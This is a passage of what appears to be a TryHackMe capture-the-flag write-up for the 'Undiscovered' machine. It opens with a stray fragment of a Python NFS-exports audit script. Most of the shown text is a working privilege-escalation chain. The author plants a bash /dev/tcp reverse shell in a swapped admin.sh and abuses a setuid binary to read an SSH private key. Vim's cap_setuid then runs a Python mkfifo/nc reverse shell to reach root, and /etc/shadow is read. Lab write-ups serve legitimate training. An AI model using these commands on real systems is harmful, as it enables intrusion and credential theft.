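    return {(p, h): audit_export(p, h, o) for p, h, o in parse_exports(text)}


if __name__ == "__main__":
    for (path, host), findings in audit_exports(SAMPLE_EXPORTS).items():
        print(f"{path} {host}: {'OK' if not findings else ''}")
        for f in findings:
            print(f"  - {f}")
```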
Root flag
Now that we have the user.txt we can also see an admin.sh and a script.
$ file *
admin.sh: POSIX shell script, ASCII text executable
script: setuid, setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=6e324a50ee883a60b395cdd1c6a64f96e6546736, not stripped
user.txt: ASCII text
$ cat admin.sh
#!/bin/sh
echo "[i] Start Admin Area!"
echo "[i] Make sure to keep this script safe from anyone else!"
exit 0
Ok, unfortunately we do not have write access to admin.sh.
$ ls -l
-rwxr-xr-x 1 root root 128 Sep 4 14:43 admin.sh
However we can move it and replace it with our own admin.sh.
$ mv admin.sh admin1.sh
$ vi admin.sh
$ chmod 755 admin.sh
$ ls -l
total 24
-rwxr-xr-x 1 root root 128 Sep 4 14:43 admin1.sh
-rwxr-xr-x 1 william william 53 Nov 30 15:22 admin.sh
-rwsrwsr-x 1 nobody 4294967294 8776 Sep 4 15:11 script
-rw-r----- 1 root william 38 Sep 9 17:36 user.txt
$ cat admin.sh
#!/bin/bash
bash -i >& /dev/tcp/10.9.5.198/4455 0>&1
Not sure if this gets called, but in case it does I have set up nc -nlvp 4455 in a terminal. I then made the directory accessible to everyone by running chmod 777 against the mounted directory. I am now able to enter it on the server.
www-data@undiscovered:/home$ ls -l
total 8
drwxr-x--- 5 leonard leonard 4096 Sep 9 21:45 leonard
drwxrwxrwx 4 william william 4096 Nov 30 23:22 william
www-data@undiscovered:/home$ cd william/
www-data@undiscovered:/home/william$ ls -l
total 24
-rwxrwxrwx 1 william william 53 Nov 30 23:22 admin.sh
-rwxr-xr-x 1 root root 128 Sep 4 21:43 admin1.sh
-rwsrwsr-x 1 leonard leonard 8776 Sep 4 22:11 script
-rw-r----- 1 root william 38 Sep 10 00:36 user.txt
Running ./script runs admin.sh and we get a call back to our listener, but as www-data, which is not what we want. Running strings across the file, it looks like it cats a file in /home/leonard:
UH-P
/bin/catH
/home/lH
eonard/
dH34%(
AWAVA
AUATL
[]A\A]A^A_
./admin.sh
;*3$"
Let's try something out ....
www-data@undiscovered:/home/william$ ./script .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
Taking that key we are able to ssh as leonard.
$ ssh -i leo leonard@undiscovered
load pubkey "leo": invalid format
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-189-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Fri Sep 4 22:57:43 2020 from 192.168.68.129
leonard@undiscovered:~$
Now we are leonard we are able to run vim. So let's look back through our notes and see that vim had cap_setuid+ep set, so let's try our GTFOBins again:
vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
Damn, that sucks.... let's take a look at .viminfo to see if there is anything interesting recorded in there ...
-' 1 0 :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
-' 3 0 :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
-' 1 0 :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
-' 3 0 :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
-' 1 0 :py3 import os;os.setuid(0);os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.68.129 1337 >/tmp/f")
-' 1 0 :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
-' 3 0 :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
-' 1 0 :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
-' 3 0 :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
-' 3 0 :py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
# History of marks within files (newest to oldest):
> :py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
" 3 0
^ 3 1
. 3 0
+ 3 0
> :py3 import os;os.setuid(0);os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.68.129 1337 >/tmp/f")
" 1 0
> :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
" 1 0
^ 3 0
. 2 2
+ 2 2
Hmmm, very odd: above, amongst our own commands, there is what looks like a reverse shell.... let's try that.
leonard@undiscovered:~$ vim -c ':py3 import os;os.setuid(0);os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.5.198 4455 >/tmp/f")'
we get the output
rm: cannot remove '/tmp/f': No such file or directory
and in our listener we get
$ nc -lvnp 4455
listening on [any] 4455 ...
connect to [10.9.5.198] from (UNKNOWN) [10.10.46.19] 45602
# id
uid=0(root) gid=1002(leonard) groups=1002(leonard),3004(developer)
#
Success, we are root, now let's collect our flag.
# ls /root
root.txt
# cat /root/root.txt
_ _ _ _ _
| | | | | (_) | |
| | | |_ __ __| |_ ___ ___ _____ _____ _ __ ___ __| |
| | | | '_ \ / _` | / __|/ __/ _ \ \ / / _ \ '__/ _ \/ _` |
| |__| | | | | (_| | \__ \ (_| (_) \ V / __/ | | __/ (_| |
\____/|_| |_|\__,_|_|___/\___\___/ \_/ \___|_| \___|\__,_|
THM{[REDACTED]}
#
But the question is not the root.txt but: What's the root user's password hash?
# cat /etc/shadow
root:[REDACTED]:18508:0:99999:7:::